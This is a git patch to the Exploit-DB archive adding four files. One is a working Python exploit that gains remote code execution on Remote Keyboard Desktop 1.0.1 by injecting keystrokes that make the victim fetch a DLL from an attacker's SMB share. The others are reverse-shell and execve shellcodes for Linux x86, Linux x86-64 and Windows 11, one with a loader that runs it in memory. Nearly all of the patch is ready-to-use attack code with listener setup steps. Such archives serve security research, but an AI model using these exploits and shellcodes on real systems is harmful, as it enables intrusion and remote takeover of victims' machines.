From 6d030b37a60c2264902be54e42b1015714b64265 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Thu, 22 May 2025 00:16:30 +0000 Subject: [PATCH] DB: 2025-05-22 6 changes to exploits/shellcodes/ghdb Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE) Linux/x86 - Reverse TCP Shellcode (95 bytes) Linux/x86-64 - execve(_/bin/sh_) Shellcode (36 bytes) Windows 11 x64 - Reverse TCP Shellcode (564 bytes) --- exploits/windows/remote/52299.py | 132 ++++++++++++ files_exploits.csv | 1 + files_shellcodes.csv | 3 + shellcodes/linux_x86-64/52296.asm | 31 +++ shellcodes/linux_x86/52297.c | 43 ++++ shellcodes/windows_x86-64/52298.py | 335 +++++++++++++++++++++++++++++ 6 files changed, 545 insertions(+) create mode 100755 exploits/windows/remote/52299.py create mode 100644 shellcodes/linux_x86-64/52296.asm create mode 100644 shellcodes/linux_x86/52297.c create mode 100755 shellcodes/windows_x86-64/52298.py diff --git a/exploits/windows/remote/52299.py b/exploits/windows/remote/52299.py new file mode 100755 index 000000000..8efd8e22d --- /dev/null +++ b/exploits/windows/remote/52299.py @@ -0,0 +1,132 @@ +# Exploit Title: Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE) +# Date: 05/17/2025 +# Exploit Author: Chokri Hammedi +# Vendor Homepage: https://remotecontrolio.web.app/ +# Software Link: https://apps.microsoft.com/detail/9n0jw8v5sc9m?hl=neutral&gl=US&ocid=pdpshare +# Version: 1.0.1 +# Tested on: Windows 10 Pro Build 19045 + +# Start Remote Keyboard Desktop on your windows +# Preparing: +# +# 1. Generating payload (dll/exe): +# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.105 LPORT=8080 -f dll > shell.dll +# 2. Start smb server: impacket-smbserver SHARE . -smb2support +# 3. nc -lnvp 8080 +# 4. python exploit.py +##### + +#!/usr/bin/env python3 + +import websocket +import json +import time + +target = "192.168.8.105" +lhost = "192.168.8.101" +WS_URL = f"ws://{target}:8080/" +payload = "shell2.dll" # payload dll/exe filename +debug = False + +HEADER_LIST = [ + "User-Agent: Dart/3.7 (dart:io)", + f"Origin: http://{target}:8080", + "Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits" +] + +#SMB_PATH = f"cmd /c \\\\{lhost}\\SHARE\\{payload}" # exe based + +SMB_PATH = f"rundll32.exe \\\\{lhost}\\SHARE\\{payload},ExportedFunc" # dll +based + +special_mapping = { + ' ': ("SPACE", False), + '/': ("NUMPAD_DIVIDE", False), + '\\': ("\\", False), + '.': ("NUMPAD_DECIMAL", False), + ',': (",", False), +} + +def send_key_event(ws, key, key_down): + event = {"command": "keyboard_event", "data": {"key": key, "keyDown": +key_down, "capsLock": False}} + ws.send(json.dumps(event)) + +def send_text(ws, text, delay=0.05): + shift_pressed = False + for ch in text: + if ch in special_mapping: + key_name, need_shift = special_mapping[ch] + elif ch.isalpha(): + need_shift = ch.isupper() + key_name = ch.upper() + elif ch.isdigit(): + key_name = ch + need_shift = False + else: + raise ValueError(f"No key mapping for character: {ch!r}") + + if need_shift and not shift_pressed: + send_key_event(ws, "SHIFT", True) + shift_pressed = True + elif not need_shift and shift_pressed: + send_key_event(ws, "SHIFT", False) + shift_pressed = False + + send_key_event(ws, key_name, True) + send_key_event(ws, key_name, False) + time.sleep(delay) + + if shift_pressed: + send_key_event(ws, "SHIFT", False) + +def send_key(ws, keys, delay=0.05): + for key in keys: + send_key_event(ws, key, True) + time.sleep(delay) + for key in reversed(keys): + send_key_event(ws, key, False) + +def on_open(ws): + print ("Let's start!") + + send_key(ws, ["LEFT_WINDOWS", "R"]) + time.sleep(0.5) + + send_text(ws, SMB_PATH) + send_key(ws, ["RETURN"]) + print ("Executing...") + time.sleep(1.2) + + print("Check your listener!") + if debug: + + print("\033[42;37mExploit by blue0x1 - github.com/blue0x1\033[0m +") + + ws.close() + +def on_message(ws, message): + if debug: + print("[=] Received:", message) + +def on_error(ws, error): + if debug: + print("[!] Error:", error) + +def on_close(ws, code, reason): + if debug: + print(f"[x] Closed: {code} - {reason}") + +if __name__ == "__main__": + websocket.enableTrace(debug) + ws = websocket.WebSocketApp( + WS_URL, + header=HEADER_LIST, + on_open=on_open, + on_message=on_message, + on_error=on_error, + on_close=on_close + ) + + ws.run_forever() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 592e4bab1..937480489 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -45357,6 +45357,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 34668,exploits/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)",2014-09-15,"Daniele Linguaglossa",remote,windows,80,2014-09-15,2016-10-10,1,CVE-2014-6287;OSVDB-111386,,,http://www.exploit-db.com/screenshots/idlt35000/screen-shot-2014-10-28-at-91538-am.png,http://www.exploit-db.comhfs2.3_288.zip, 39161,exploits/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)",2016-01-04,"Avinash Thapa",remote,windows,,2016-01-04,2016-05-09,1,CVE-2014-6287;OSVDB-111386,,,,http://www.exploit-db.comhfs2.3c.src.zip, 49599,exploits/windows/remote/49599.py,"Remote Desktop Web Access - Authentication Timing Attack (Metasploit Module)",2021-02-26,"Matthew Dunn",remote,windows,,2021-02-26,2021-02-26,0,,,,,, +52299,exploits/windows/remote/52299.py,"Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE)",2025-05-21,"Chokri Hammedi",remote,windows,,2025-05-21,2025-05-21,0,,,,,, 46697,exploits/windows/remote/46697.py,"RemoteMouse 3.008 - Arbitrary Remote Command Execution",2019-04-15,0rphon,remote,windows,,2019-04-15,2021-01-08,1,,Remote,,http://www.exploit-db.com/screenshots/idlt47000/image.png,http://www.exploit-db.comRemoteMouse.exe, 1565,exploits/windows/remote/1565.pl,"RevilloC MailServer 1.21 - 'USER' Remote Buffer Overflow",2006-03-07,"securma massine",remote,windows,110,2006-03-06,,1,OSVDB-23735;CVE-2006-1124,,,,, 16775,exploits/windows/remote/16775.rb,"RhinoSoft Serv-U FTP Server - Session Cookie Buffer Overflow (Metasploit)",2010-03-10,Metasploit,remote,windows,,2010-03-10,2016-09-27,1,CVE-2009-4006;OSVDB-59772,"Metasploit Framework (MSF)",,,, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 92132dd6a..31bb8753d 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -630,6 +630,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd 17371,shellcodes/linux_x86/17371.c,"Linux/x86 - Reverse (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",,linux_x86,422,2011-06-08,2018-01-17,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-770.php 43674,shellcodes/linux_x86/43674.c,"Linux/x86 - Reverse (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,eSDee,,linux_x86,131,2018-01-17,2018-01-17,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-552.php 13340,shellcodes/linux_x86/13340.c,"Linux/x86 - Reverse PHP (Writes To /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,,linux_x86,508,2008-08-17,2017-07-04,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-208.php +52297,shellcodes/linux_x86/52297.c,"Linux/x86 - Reverse TCP Shellcode (95 bytes)",2025-05-21,"Al Baradi Joy",,linux_x86,95,2025-05-21,2025-05-21,0,,,,,, 35519,shellcodes/linux_x86/35519.c,"Linux/x86 - rmdir() Shellcode (37 bytes)",2014-12-11,kw4,,linux_x86,37,2014-12-30,2014-12-30,0,,,,,, 43691,shellcodes/linux_x86/43691.c,"Linux/x86 - rmdir(/tmp/willdeleted) Shellcode (41 bytes)",2010-05-31,gunslinger_,,linux_x86,41,2018-01-17,2018-01-17,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-633.php 18379,shellcodes/linux_x86/18379.c,"Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)",2012-01-17,rigan,,linux_x86,380,2012-01-17,2017-08-24,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-799.php @@ -820,6 +821,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd 41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",,linux_x86-64,31,2017-03-03,2017-08-24,0,,,,,, 13320,shellcodes/linux_x86-64/13320.c,"Linux/x64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,,linux_x86-64,49,2009-05-13,2017-07-04,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-77.php 47183,shellcodes/linux_x86-64/47183.c,"Linux/x86 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (168 bytes)",2019-07-29,"Pedro Cabral",,linux_x86-64,168,2019-07-29,2019-08-01,0,,,,,, +52296,shellcodes/linux_x86-64/52296.asm,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (36 bytes)",2025-05-21,"Sayan Ray",,linux_x86-64,36,2025-05-21,2025-05-21,0,,,,,, 51258,shellcodes/linux_x86-64/51258.txt,"Linux/x86_64 - bash Shellcode with xor encoding",2023-04-05,"Jeenika Anadani",,linux_x86-64,71,2023-04-05,2023-04-05,0,,,,,, 47290,shellcodes/linux_x86-64/47290.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (129 bytes)",2019-08-19,"Gonçalo Ribeiro",,linux_x86-64,129,2019-08-19,2019-08-20,0,,,,,, 46979,shellcodes/linux_x86-64/46979.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2019-06-10,"Aron Mihaljevic",,linux_x86-64,104,2019-06-10,2019-06-10,0,,,,,, @@ -1039,6 +1041,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd 50368,shellcodes/windows_x86/50368.c,"Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)",2021-10-01,"Daniel Ortiz",,windows_x86,,2021-10-01,2021-10-29,0,,,,,, 39900,shellcodes/windows_x86/39900.c,"Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",,windows_x86,184,2016-06-07,2016-09-05,0,,,,,, 14288,shellcodes/windows_x86/14288.asm,"Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",,windows_x86,278,2010-07-09,2017-08-24,1,CVE-2010-0425,,,,,http://shell-storm.org/shellcode/files/shellcode-681.php +52298,shellcodes/windows_x86-64/52298.py,"Windows 11 x64 - Reverse TCP Shellcode (564 bytes)",2025-05-21,"Victor Huerlimann",,windows_x86-64,564,2025-05-21,2025-05-21,0,,,,,, 41827,shellcodes/windows_x86-64/41827.asm,"Windows/x64 (10) - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",,windows_x86-64,45,2017-04-06,2017-04-06,0,,,,,, 45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes)",2018-08-29,n30m1nd,,windows_x86-64,50,2018-08-29,2018-09-08,0,,,,,, 37895,shellcodes/windows_x86-64/37895.asm,"Windows/x64 (2003) - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",,windows_x86-64,59,2015-08-20,2015-08-20,0,,,,,, diff --git a/shellcodes/linux_x86-64/52296.asm b/shellcodes/linux_x86-64/52296.asm new file mode 100644 index 000000000..ba66da680 --- /dev/null +++ b/shellcodes/linux_x86-64/52296.asm @@ -0,0 +1,31 @@ +# Exploit Title: Linux/x86-64 execve("/bin/sh") Shellcode (36 bytes) +# Date: 2025-03-23 +# Exploit Author: Sayan Ray [@barebones90] +# Tested on: Linux x86-64 +# CVE: N/A + +; P0P SH311 execve ("/bin/sh", NULL, NULL) + +GLOBAL _start + +section .text + +_start: + xor rax, rax + push rax + + mov r10, 0x68732f6e69622f ; hs/nib/ + push r10 + + mov rdi, rsp ; rdi points to the string "/bin/sh" from the stack + ; ( const char *pathname ) + + ; Calling execve + mov rax, 0x3b ; 59 [execve syscall] + mov rsi, 0 ; NULL ( char *const _Nullable argv[] ) + mov rdx, 0 ; NULL ( char *const _Nullable envp[] ) + syscall + +; Shellcode: +; \x48\x31\xc0\x50\x49\xba\x2f\x62\x69\x6e\x2f\x73\x68\x00\x41\x52\x48\x89\xe7\xb8\x3b\x00\x00\x00\xbe\x00\x00\x00\x00\xba\x00\x00\x00\x00\x0f\x05 +; [Length] : 36 \ No newline at end of file diff --git a/shellcodes/linux_x86/52297.c b/shellcodes/linux_x86/52297.c new file mode 100644 index 000000000..2b02b3a2b --- /dev/null +++ b/shellcodes/linux_x86/52297.c @@ -0,0 +1,43 @@ +/* +# Exploit Title: Linux/x86 - Reverse TCP Shellcode (95 bytes) +# Date: 2025-04-06 +# Exploit Author: Al Baradi Joy +# Platform: Linux x86 +# Type: Shellcode +# Shellcode Length: 95 bytes +# Tested On: Kali Linux x86 +# Connect-Back IP: 192.168.1.100 +# Connect-Back Port: 4444 + +Description: +This is a null-free reverse TCP shell shellcode for Linux x86 that connects back to 192.168.1.100:4444 and spawns a /bin/sh shell. Useful in remote code execution exploits for getting a remote shell. + +Usage: +Start a netcat listener on your attacking machine: + nc -lvnp 4444 + +Compile and run on the target machine: + gcc -fno-stack-protector -z execstack shellcode.c -o shellcode + ./shellcode +*/ + +#include +#include + +unsigned char shellcode[] = +"\x31\xc0\x31\xdb\x31\xc9\x31\xd2" // zero out registers +"\x50\x6a\x01\x6a\x02\x89\xe1\xb0\x66" // socket syscall +"\xcd\x80\x89\xc6\x31\xc0\x68\xc0\xa8\x01\x64" // push IP: 192.168.1.100 +"\x66\x68\x11\x5c" // push port 4444 +"\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56" +"\x89\xe1\xb0\x66\xb3\x03\xcd\x80" // connect +"\x31\xc9\xb1\x02\x89\xf3\xb0\x3f" // dup2 loop +"\xcd\x80\x49\x79\xf9" +"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e" +"\x89\xe3\x31\xc9\xb0\x0b\xcd\x80"; // execve("/bin/sh") + +int main() { + printf("Shellcode Length: %zu\n", strlen(shellcode)); + int (*ret)() = (int(*)())shellcode; + ret(); +} \ No newline at end of file diff --git a/shellcodes/windows_x86-64/52298.py b/shellcodes/windows_x86-64/52298.py new file mode 100755 index 000000000..2c89e85bb --- /dev/null +++ b/shellcodes/windows_x86-64/52298.py @@ -0,0 +1,335 @@ +#!/usr/bin/python +# +# Description: Windows 11 x64 Reverse TCP Shell +# Architecture: x64 +# OS: Microsoft Windows +# Author: hvictor (Victor Huerlimann) +# Shellcode Size: 564 bytes +# Repository:https://github.com/hvictor/shellcode-x64 +# +# Special thanks to wetw0rk (Milton Valencia), from whom I drew inspiration for the indicated parts of the code: https://github.com/wetw0rk/Sickle +# +# Note: You will have to modify the line 193 of this file according to the attacker's IP and port: +# mov r9, 0x7901A8C029230002 # R9 = [IP = 192.168.1.121 | port = 0x2329 = 9001 | AF_INET = 2] +# The high DWORD is the IPv4 address in little-endian, followed by the 2-bytes port in little-endian, and the 2-bytes address family. + +import ctypes, struct +from ctypes import wintypes + +from keystone import * +CODE = ( +''' +start: + mov rbp, rsp + sub rsp, 1600 + +resolve_kernel32: + mov dl, 0x4b # dl = 'K' + mov rcx, 0x60 # + mov r8, gs:[rcx] # R8 = address of PEB + mov rdi, [r8 + 0x18] # RDI = address of _PEB_LDR_DATA + mov rdi, [rdi + 0x30] # RDI = address of InInitializationOrderModuleList (first _LIST_ENTRY) +search: + xor rcx, rcx + mov rbx, [rdi + 0x10] # RBX = DllBase + mov rsi, [rdi + 0x40] # RSI = address of UNICODE string BaseDllName.Buffer + mov rdi, [rdi] # RDI = address of the next _LIST_ENTRY + cmp [rsi + 0x18], cx # Compare the 24-th UNICODE char with NULL + jne search # If length of BaseDllName is not 12 UNICODE chars, continue searching + cmp [rsi], dl # Compare the first UNICODE char with 'K' + jne search # If the first UNICODE char is not 'K', continue searching + +find_function_jmp: + jmp callback # Jump to callback to make a negative (null byte free) call to get_find_function_addr + +get_find_function_addr: + pop rsi # The address of find_function is popped in RSI + mov [rbp + 0x8], rsi # The address of find_function is stored at (RBP + 8) + jmp resolve_k32_sym # Once the address of find_function has been stored, proceed with the resolution of kernel32 symbols + +callback: + call get_find_function_addr # When this call is done, the address of the 1st instruction find_function (add rsp, 8) is pushed to the stack + # This is the address of find_function, and it will be popped in ESI (see get_find_function_addr). + +find_function: + +# Current Stack Layout: +#--------------------------------------------------------------------------- +# QWORD: Return Address (addr of instruction after "call find_function", see below) +# QWORD: Number of hash bytes + 8 <- RSP +# QWORD: <0x00000000> +# QWORD: <0x00000000> +# ... +# QWORD: 0x0000000000000000 +#--------------------------------------------------------------------------- + + add rsp, 8 # Point RSP to (Number of hash bytes + 8) + pop rax # RAX = Number of hash bytes + 8 + push -1 # Write -1 on the stack instead of (Number of hash bytes + 8) + add rsp, rax # Add (Number of hash bytes + 8) to RSP: it now points to 0x0000000000000000 + +# Current Stack Layout: +#--------------------------------------------------------------------------- +# QWORD: Return Address +# QWORD: 0xffffffffffffffff +# QWORD: <0x00000000> +# QWORD: <0x00000000> +# ... +# QWORD: 0x0000000000000000 <- RSP +#--------------------------------------------------------------------------- + +find_function_loop2: + xor rax, rax + xor rdi, rdi + mov eax, [rbx + 0x3c] # EAX = offset to the PE Header of the module = e_lfanew + mov edi, [rbx + rax + 0x88] # EDI = RVA of the Export Directory Table of the module (1st field: VirtualAddress) + add rdi, rbx # RDI = VMA of the Export Directory Table of the module + mov ecx, [rdi + 24] # ECX = NumberOfNames (field of the Export Directory Table of the module) + mov eax, [rdi + 32] # EAX = RVA of AddressOfNames (array of Name Addresses, field of the Export Directory Table) + add rax, rbx # EAX = VMA of AddressOfNames + mov [rbp - 8], rax # Save the VMA of AddressOfNames at (EBP - 8): this location is never touched for anything else + +find_function_loop: + dec ecx # Initially, ECX = NumberOfNames: decrement to get the index of the last name + mov rax, [rbp - 8] # EAX = VMA of AddressOfNames + mov esi, [rax + rcx * 4] # ESI = RVA of the current Symbol Name + add rsi, rbx # RSI = VMA of the current Symbol Name + +compute_hash: + xor rax, rax # EAX = 0 + cdq # If the MSB of EAX = 1: EDX = 0x11111111 + # If the MSB of EAX = 0: EDX = 0x00000000 -> fills EDX with the sign of EAX + # In this case, EDX = 0x00000000 because EAX = 0x00000000 + +compute_hash_repeat: + ror edx, 0xd # Right-shift EDX of 13 bits + add edx, eax # EDX += current EAX value + lodsb # Load the byte pointed by ESI into AL + test al, al # Test if the NULL terminator of the Symbol Name has been reached + jnz compute_hash_repeat # If the NULL terminator has been reached (ZF = 1), proceed to hash comparison + # Else, perform the next iteration of the hash-computation algorithm + # At this point, EDX contains the computed hash of the current symbol + +find_function_compare: + cmp edx, [rsp - 8] # Compare the computed hash with the hash of the wanted symbol + jnz find_function_loop # If ZF = 0, the hash is different: proceed with the next name from AddressOfNames + # If ZF = 1, the hash is equal: symbol found: continue hereby + mov edx, [rdi + 36] # EDX = RVA of the AddressOfNameOrdinals array + add rdx, rbx # RDX = VMA of the AddressOfNameOrdinals array + mov cx, [rdx + 2 * rcx] # CX = Symbol's Ordinal (lower 16 bits of ECX) + mov edx, [rdi + 28] # EDX = RVA of the AddressOfFunctions array + add rdx, rbx # RDX = VMA of the AddressOfFunctions array + mov eax, [rdx + 4 * rcx] # EAX = AddressOfFunctions[ordinal] = RVA of the wanted symbol + add rax, rbx # EAX = VMA of the wanted symbol + push rax # Push the wanted symbol's VMA onto the stack: + # ATTENTION: The symbol's VMA overwrites its Hash on the stack! + mov rax, [rsp - 8] + cmp rax, -1 # If *(RSP - 8) is -1: ZF = 1: all wanted symbols have been resolved + jnz find_function_loop2 # Until all wanted symbols have been resolved, continue looping + +find_function_finish: # When we get here, all wanted symbols have been resolved: their VMAs are on the stack + sub rsp, 16 # Point RSP to the Return Address of find_function + ret # Return + +resolve_k32_sym: + mov rax, 0x00000000ec0e4e8e # Hash of LoadLibraryA + push rax + mov rax, 0x0000000016b3fe72 # Hash of CreateProcessA + push rax + mov rax, 0x0000000078b5b983 # Hash of TerminateProcess + push rax + mov rax, 32 # Push 32 onto the stack + push rax + call [rbp + 8] # Call to find_function (see find_function above) + +load_ws2_32: + mov rax, 0x0000000000006C6C # 'll x00 x00 x00 x00 x00 x00' (reversed) + push rax + mov rax, 0x642E32335F327377 # 'ws2_32.d' (reversed) + push rax + mov rcx, rsp # Paramter 1 = address of "ws2_32.dll" + sub rsp, 40 # Create 40 bytes of room on the stack + call [rsp + 80] # Call LoadLibraryA + nop + +resolve_ws2_sym: + mov rbx, rax # RBX = Base Address of ws2_32.dll + mov rax, 0x0000000060aaf9ec # Hash of connect + push rax + mov rax, 0x00000000adf509d9 # Hash of WSASocketA + push rax + mov rax, 0x000000003bfcedcb # Hash of WSAStartup + push rax + mov rax, 32 + push rax # Push 32 (Number of Hashes pushed + 8) + call [rbp + 8] # Call find_function + + sub rsp, 512 + +call_WSAStartup: + mov rcx, 0x202 # RCX = WinSock Version 2.2 + lea rdx, [rsp + 800] # RDX = Address of output WSAData structure + call [rsp + 520] # Call WSAStartup + +call_WSASocketA: + mov rcx, 2 # Parameter af = 2 (AF_INET) + mov rdx, 1 # Parameter type = 1 + mov r8, 6 # Parameter protocol = 6 (TCP) + xor r9, r9 # Parameter lpProtocolInfo = 0 + mov [rsp + 32], r9 # Parameter dwFlags = 0 + mov [rsp + 40], r9 # Parameter g = 0 + call [rsp + 528] # Call WSASocketA + + +call_connect: + mov rsi, rax # Save socket fd in RSI + mov rcx, rax # RCX = Parameter s = socket fd created with WSSocketA + mov r8, 16 # R8 = Parameter namelen = 16 + + # Preparation of the sockaddr_in structure on the stack: + # struct sockaddr_in { + # QWORD: [sin_addr (4 bytes) | sin_port (2 bytes) | sin_family (2 bytes)] + # QWORD: sin_zero = [00000000 00000000] + # } + mov r9, 0x7901A8C029230002 # R9 = [IP = 192.168.1.121 | port = 0x2329 = 9001 | AF_INET = 2] + lea rdx, [rsp + 800] # RDX = Parameter name = Address of struct sockaddr_in + mov [rdx], r9 # Write fields: sin_addr, sin_port, sin_family + xor r9, r9 + mov [rdx + 8], r9 # Write field sin_zero + call [rsp + 536] # Call connect + +# Thanks to wetw0rk (Milton Valencia) for his setup_STARTUPINFOA implementation: +# https://github.com/wetw0rk/Sickle/blob/master/src/sickle/payloads/windows/x64/shell_reverse_tcp.py +create_STARTUPINFOA: + lea rdi, [rsp + 800] + add rdi, 0x300 + mov rbx, rdi + xor eax, eax + mov ecx, 0x20 + rep stosd # Zero-out 0x80 bytes + mov eax, 0x68 # EAX = sizeof(_STARTUPINFO) = 0x68 + mov [rbx], eax # Field lpStartInfo.cb = sizeof(_STARTUPINFO) + mov eax, 0x100 # EAX = STARTF_USESTDHANDLES + mov [rbx + 0x3c], eax # Field lpStartupInfo.dwFlags = STARTF_USESTDHANDLES + mov [rbx + 0x50], rsi # Field lpStartupInfo.hStdInput = socket fd + mov [rbx + 0x58], rsi # Field lpStartupInfo.hStdOutput = socket fd + mov [rbx + 0x60], rsi # Field lpStartupInfo.hStdError = socket fd + +# Thanks to wetw0rk (Milton Valencia) for his call_CreateProcessA implementation: +# https://github.com/wetw0rk/Sickle/blob/master/src/sickle/payloads/windows/x64/shell_reverse_tcp.py +call_CreateProccessA: + xor rax, rax + xor rcx, rcx # Parameter lpApplicationName = 0 + lea rdx, [rsp + 800] # Parameter lpCommandLine + add rdx, 0x180 + mov eax, 0x646d63 # EAX = "cmd" + mov [rdx], rax # Write "cmd" in the lpCommandLine parameter + xor r8, r8 # Parameter lpProcessAttributes = 0 + xor r9, r9 # Parameter lpThreadAttributes = 0 + xor rax, rax + inc eax + mov [rsp + 0x20], rax # Parameter bInheritHandles = 1 + dec eax + mov [rsp + 0x28], rax # Parameter dwCreationFlags = 0 + mov [rsp + 0x30], rax # Parameter lpEnvironment = 0 + mov [rsp + 0x38], rax # Parameter lpCurrentDirectory = 0 + mov [rsp + 0x40], rbx # Parameter lpStartupInfo = address of _STARTUPINFO + add rbx, 0x68 + mov [rsp + 0x48], rbx # Parameter lpProcessInformation = output address, right after _STARTUPINFO + call [rsp + 616] + +call_TerminateProcess: + xor rcx, rcx + dec rcx # Parameter hProcess = -1 = this process + xor rdx, rdx # Parameter uExitCode = 0 (graceful termination) + int3 + call [rsp + 608] # Call TerminateProcess +''' +) + + +# Initialize engine in 64-bit mode +ks = Ks(KS_ARCH_X86, KS_MODE_64) +encoding, count = ks.asm(CODE) +instructions = "" +for dec in encoding: + instructions += "\\x{0:02x}".format(int(dec)).rstrip("\n") + +print("Opcodes = (\"" + instructions + "\")") +print(f"Size: {len(encoding)} bytes.") + +# E + +# Preparation of WSAStartup (not included in the shellcode) +# Define necessary structures and constants +class WSADATA(ctypes.Structure): + _fields_ = [ + ("wVersion", wintypes.WORD), + ("wHighVersion", wintypes.WORD), + ("szDescription", wintypes.CHAR * 257), + ("szSystemStatus", wintypes.CHAR * 129), + ("iMaxSockets", wintypes.UINT), + ("iMaxUdpDg", wintypes.UINT), + ("lpVendorInfo", ctypes.POINTER(ctypes.c_char)) + ] + +# Load the Winsock library +ws2_32 = ctypes.windll.ws2_32 + +# Define the WSAStartup function prototype +# WSAStartup takes two arguments: +# 1. A WORD containing the version of Winsock requested (e.g., 0x0202 for Winsock 2.2) +# 2. A pointer to a WSADATA structure that receives the details of the Winsock implementation +ws2_32.WSAStartup.argtypes = [wintypes.WORD, ctypes.POINTER(WSADATA)] +ws2_32.WSAStartup.restype = wintypes.INT + +def call_wsastartup(): + # Request version 2.2 (0x0202) + version_requested = 0x0202 + + # Create an instance of WSADATA to hold the output + wsadata = WSADATA() + + # Call WSAStartup + result = ws2_32.WSAStartup(version_requested, ctypes.byref(wsadata)) + + if result != 0: + raise RuntimeError(f"WSAStartup failed with error code {result}") + + print(f"WSAStartup succeeded. Winsock version: {wsadata.wVersion >> 8}.{wsadata.wVersion & 0xFF}") + return wsadata + +call_wsastartup() + +sh = b"" +for e in encoding: + sh += struct.pack("B", e) +shellcode = bytearray(sh) + +# Alloco memoria eseguibile per lo shellcode +ptr = ctypes.windll.kernel32.VirtualAlloc(0x10000000, + ctypes.c_int(len(shellcode)), + ctypes.c_int(0x3000), + ctypes.c_int(0x40)) + +# Metto lo shellcode nel buffer `buf` +buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) + +# Copio lo shellcode nella memoria allocata +ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), + buf, + ctypes.c_int(len(shellcode))) + +print("Shellcode: Short Reverse Shell") +print("Shellcode address = %s" % hex(ptr)) +input("\n[?] Press Enter to execute the shellcode: ") + +# Eseguo lo shellcode in un nuovo thread, su cui faccio la join +ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), + ctypes.c_int(0), + ctypes.c_int(ptr), + ctypes.c_int(0), + ctypes.c_int(0), + ctypes.pointer(ctypes.c_int(0))) + +ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1)) \ No newline at end of file